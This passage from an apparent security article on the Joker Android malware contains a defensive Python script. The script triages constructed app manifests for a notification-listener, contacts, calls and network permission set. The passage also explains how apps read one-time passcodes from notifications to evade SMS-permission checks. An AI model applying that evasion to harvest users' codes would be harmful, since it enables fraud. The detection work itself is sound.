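The permission pattern described above (a notification listener standing in for SMS access, plus contacts and call capability in an app whose purpose does not need them) is something a reviewer can triage from the manifest before any dynamic analysis. The script below is an added example, not Quick Heal's or Google's tooling: it parses a constructed AndroidManifest.xml for a hypothetical messaging app (not one of the eight apps listed), records which of these capabilities are declared, and applies an assumed scoring rule. The rule is a heuristic for prioritising review, not a verdict on its own.

```python
"""Manifest triage for the Joker-style capability set: notification listener
(reads OTPs out of SMS notifications), contacts, phone calls, network.
Added example; the manifest below is constructed and the threshold in
verdict() is an assumption for illustration."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS
PERMISSION = "{%s}permission" % ANDROID_NS

NOTIF_LISTENER_PERM = "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
NOTIF_LISTENER_ACTION = "android.service.notification.NotificationListenerService"

# Constructed manifest for a hypothetical SMS app (not a real sample).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.supersms">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <application>
        <service android:name=".NotifService"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService"/>
            </intent-filter>
        </service>
    </application>
</manifest>
"""

# Constructed benign counterpart: a wallpaper app with only network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wallpapers">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application/>
</manifest>
"""


def declared_permissions(root):
    return {e.get(NAME) for e in root.iter("uses-permission")}


def has_notification_listener(root):
    """True if any service binds as a NotificationListenerService."""
    for svc in root.iter("service"):
        if svc.get(PERMISSION) == NOTIF_LISTENER_PERM:
            return True
        if any(a.get(NAME) == NOTIF_LISTENER_ACTION for a in svc.iter("action")):
            return True
    return False


def triage(manifest_xml):
    """Return the list of capability indicators declared in the manifest."""
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(root)
    indicators = []
    if has_notification_listener(root):
        indicators.append("notification listener (can read SMS/OTP notification text)")
    if {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"} & perms:
        indicators.append("direct SMS access")
    if "android.permission.READ_CONTACTS" in perms:
        indicators.append("contacts access")
    if "android.permission.CALL_PHONE" in perms:
        indicators.append("can place calls")
    if "android.permission.INTERNET" in perms:
        indicators.append("network access (exfiltration / WAP billing pages)")
    return indicators


def verdict(indicators):
    # Assumed rule: a notification listener plus at least two further
    # indicators puts the app at the front of the review queue.
    listener = any(i.startswith("notification listener") for i in indicators)
    return "suspicious" if listener and len(indicators) >= 3 else "review"


if __name__ == "__main__":
    for label, xml in (("supersms", SAMPLE_MANIFEST), ("wallpapers", BENIGN_MANIFEST)):
        found = triage(xml)
        print(label, verdict(found), found)
```

The point of keying on the listener service rather than READ_SMS is the evasion the report describes: an app can pull OTPs out of notification text without ever declaring the SMS permissions that store review and permission-based scanners look for.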

“Joker is one of the most prominent malware families that continually targets Android devices. Despite awareness of this particular malware, it keeps finding its way into Google’s official application market by employing changes in its code, execution methods, or payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information along with silently signing up the victim for premium wireless application protocol (WAP) services,” Zscaler stated in a blog post.